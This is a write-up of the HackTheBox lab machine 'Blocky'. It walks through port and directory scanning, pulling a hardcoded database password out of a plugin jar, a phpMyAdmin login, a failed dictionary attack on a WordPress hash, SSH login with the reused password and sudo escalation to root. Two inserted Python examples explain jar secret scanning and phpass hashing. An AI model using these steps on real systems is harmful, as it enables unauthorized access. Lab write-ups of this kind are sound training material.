
HackTheBox Blocky

Published 2022/09/16

Blocky

Foothold

nmap

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.10.37 -oN nmap.log
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-16 18:15 JST
PORT      STATE  SERVICE    REASON         VERSION
21/tcp    open   tcpwrapped syn-ack ttl 63
22/tcp    open   tcpwrapped syn-ack ttl 63
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http       syn-ack ttl 63 Apache httpd 2.4.18
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp  closed sophos     reset ttl 63
25565/tcp open   minecraft  syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

Ports 21, 22, 80 and 25565 are open; 8192 answered with a reset (closed).

web

gobuster

Run directory enumeration.

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ gobuster dir -u http://blocky.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/16 18:24:24 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]   
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]      
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]  
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/xmlrpc.php           (Status: 405) [Size: 42]                               
===============================================================
2022/09/16 18:26:15 Finished
===============================================================

The site is built on WordPress.
Entries of interest in the output are plugins and xmlrpc.php.

wpscan

Since WordPress was confirmed, run wpscan as well.

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ wpscan --url http://blocky.htb/ --api-token [token] --enumerate p,u --plugins-detection aggressive
===============================================================
[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 ===============================================================

Nothing especially notable in the output, but the existence of the user notch was confirmed.

plugins


Browsing to it reveals two jar files.

BlockyCore.jar

Download it and extract it with unzip.

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ unzip BlockyCore.jar -d blocky
Archive:  BlockyCore.jar
  inflating: blocky/META-INF/MANIFEST.MF  
  inflating: blocky/com/myfirstplugin/BlockyCore.class

Look inside the extracted contents.

┌──(kali㉿kali)-[~/…/Blocky/blocky/com/myfirstplugin]
└─$ cat BlockyCore.class 
localhost
root
8YsqfCTnvxAUeduzjNSXe22

Found a string that looks like a password, 8YsqfCTnvxAUeduzjNSXe22 (the output above has been tidied up; the class file is binary).
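The `cat` above works because Java string literals are stored in clear text in the class file's constant pool, which is exactly what a secret scanner in a build pipeline should look at. The following is an added example, not code from the writeup or from the BlockyCore plugin: a stdlib-only reader for the class-file constant pool (JVMS §4.4) that extracts only CONSTANT_String entries (runtime string literals, as opposed to the Utf8 entries that also hold class and method names), scans every `.class` inside a jar, and flags literals that look like credentials. The jar, the class name `com/example/Config` and the value `Xk29vQw7LmP3zTq8RbN5` are constructed in memory for the demo and are not from the box.

```python
"""Added example: pull string literals out of Java class files inside a jar
and flag secret-looking ones. Demo jar and its values are constructed here."""
import io
import math
import zipfile
from typing import Dict, List, Tuple

CAFEBABE = b"\xca\xfe\xba\xbe"
# Byte widths of the fixed-size constant-pool entries, keyed by tag (JVMS 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}


def constant_pool(data: bytes) -> Dict[int, Tuple[str, object]]:
    """Parse the constant pool; keeps Utf8 text and String->Utf8 references."""
    if data[:4] != CAFEBABE:
        raise ValueError("not a class file")
    count = int.from_bytes(data[8:10], "big")      # follows magic, minor, major
    off, idx, pool = 10, 1, {}
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:                                # CONSTANT_Utf8: u2 length + bytes
            ln = int.from_bytes(data[off:off + 2], "big")
            off += 2
            pool[idx] = ("Utf8", data[off:off + ln].decode("utf-8", "replace"))
            off += ln
        elif tag == 8:                              # CONSTANT_String: u2 index of a Utf8
            pool[idx] = ("String", int.from_bytes(data[off:off + 2], "big"))
            off += 2
        elif tag in FIXED:
            off += FIXED[tag]
            if tag in (5, 6):                       # Long/Double occupy two slots
                idx += 1
        else:
            raise ValueError(f"unknown constant tag {tag} at offset {off - 1}")
        idx += 1
    return pool


def string_literals(data: bytes) -> List[str]:
    """Only the literals the code actually uses at runtime, in pool order."""
    pool = constant_pool(data)
    return [pool[ref][1] for kind, ref in pool.values() if kind == "String"]


def looks_like_secret(s: str) -> bool:
    """Heuristic: long, no whitespace, mixed case + digits, Shannon entropy >= 3.5 bits."""
    if len(s) < 12 or any(c.isspace() for c in s):
        return False
    if not (any(c.isdigit() for c in s) and any(c.isupper() for c in s)
            and any(c.islower() for c in s)):
        return False
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs) >= 3.5


def scan_jar(fileobj) -> Dict[str, List[str]]:
    """Map each .class entry in the jar to its suspicious string literals."""
    findings = {}
    with zipfile.ZipFile(fileobj) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                hits = [s for s in string_literals(jar.read(name)) if looks_like_secret(s)]
                if hits:
                    findings[name] = hits
    return findings


# --- constructed demo input -------------------------------------------------
def _u2(n: int) -> bytes:
    return n.to_bytes(2, "big")


def _utf8(s: str) -> bytes:
    b = s.encode("utf-8")
    return b"\x01" + _u2(len(b)) + b


def build_demo_class() -> bytes:
    """Minimal class file: constant pool plus an empty body (constructed, not real code)."""
    cp = [
        _utf8("com/example/Config"),               # 1 Utf8: class name, not a literal
        b"\x07" + _u2(1),                          # 2 Class -> #1
        _utf8("localhost"), b"\x08" + _u2(3),      # 3 Utf8, 4 String -> #3
        _utf8("root"), b"\x08" + _u2(5),           # 5, 6
        _utf8("Xk29vQw7LmP3zTq8RbN5"), b"\x08" + _u2(7),   # 7, 8: constructed secret-like value
        _utf8("jdbc:mysql://localhost:3306/blocky"), b"\x08" + _u2(9),  # 9, 10
        b"\x03" + (3306).to_bytes(4, "big"),       # 11 Integer
        b"\x05" + (0).to_bytes(8, "big"),          # 12 Long (takes slots 12 and 13)
    ]
    body = _u2(0x0021) + _u2(2) + _u2(0) + _u2(0) * 4   # flags, this, super, 0 ifaces/fields/methods/attrs
    return CAFEBABE + _u2(0) + _u2(52) + _u2(14) + b"".join(cp) + body


def build_demo_jar() -> io.BytesIO:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("com/example/Config.class", build_demo_class())
    buf.seek(0)
    return buf


if __name__ == "__main__":
    print(scan_jar(build_demo_jar()))
```

Pointing `scan_jar` at a real jar (`scan_jar(open("BlockyCore.jar", "rb"))`) gives a stricter result than `strings`, because class and method names never appear in the output. The heuristic is deliberately simple; in practice you would pair it with the usual credential-shaped regexes.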

phpmyadmin

Directory enumeration had found phpmyadmin, so try whether this password works there.

username : root
password : 8YsqfCTnvxAUeduzjNSXe22

Login succeeded.

wp_user

Browsing the tables reveals wp_user.

The stored password is the hash $P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/ (the page rendering dropped the $ signs of the $P$ prefix).

john

Run john to try to crack the hash.

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt                 
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:09:08 DONE (2022-09-16 19:37) 0g/s 26154p/s 26154c/s 26154C/s  joefeher..*7¡Vamos!
Session completed

The hash was not cracked.
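John's output explains why this fails quickly: the hash is phpass, the scheme WordPress uses for wp_users, and the cost character after `$P$` (here `B`) encodes 2^13 = 8192 MD5 iterations per guess, so rockyou exhausts at ~26k guesses/s with no hit. The following is an added example, not from the writeup or from WordPress/phpass source, implementing the `$P$` scheme with the standard library so the "iteration count is 8192" line can be checked by hand. The `test12345` vector is the public one from phpass's own test file; `make_setting` generates fresh salts and is an assumption of this example.

```python
"""Added example: the phpass ($P$) password hash used by WordPress, stdlib only.
Shows how the cost character maps to an iteration count and how a stored
hash is verified (or, from john's side, why each guess costs 8193 MD5 calls)."""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant (not RFC 4648): 16 digest bytes -> 22 chars."""
    out, i = [], 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def iteration_count(setting: str) -> int:
    """'$P$B...' -> ITOA64.index('B') == 13 -> 1 << 13 == 8192 (john's 'Cost 1')."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    log2 = ITOA64.index(setting[3])
    if log2 < 7 or log2 > 30:
        raise ValueError("cost out of range")
    return 1 << log2


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the 34-char hash for `password` under the cost and 8-char salt in `setting`."""
    count = iteration_count(setting)
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("bad salt")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(count):                     # the do/while in phpass runs exactly `count` times
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def make_setting(cost_log2: int = 13) -> str:
    """Fresh '$P$' + cost char + 8 salt chars (cost 13 = 8192, as on this box). Assumed helper."""
    salt = "".join(ITOA64[b & 0x3F] for b in os.urandom(8))
    return "$P$" + ITOA64[cost_log2] + salt


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


if __name__ == "__main__":
    h = phpass_hash("correct horse battery", make_setting())
    print(h, iteration_count(h), verify("correct horse battery", h))
```

The cost character is the only tunable: WordPress ships with cost 13, which is what makes a dictionary run against a single wp_users row slow relative to raw MD5, but not slow enough to protect a weak password, so the real control is the password itself plus not leaking the MySQL credentials that expose the table.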

Shell as notch

SSH

To check whether the password is reused elsewhere, try it over SSH.

┌──(kali㉿kali)-[~/Desktop/Blocky]
└─$ ssh notch@10.10.10.37                                                           
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ whoami
notch

Got a shell.

user flag

notch@Blocky:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Flag obtained.

Privilege escalation

sudo

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch is allowed to run any command as any user via sudo.

Shell as root

/bin/sh

notch@Blocky:~$ sudo -u root /bin/sh
# whoami
root

Privilege escalation succeeded.

root flag

# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Flag obtained.

Impressions

I think this box was on the easier side. It went smoothly, so in that sense it was a fun box.
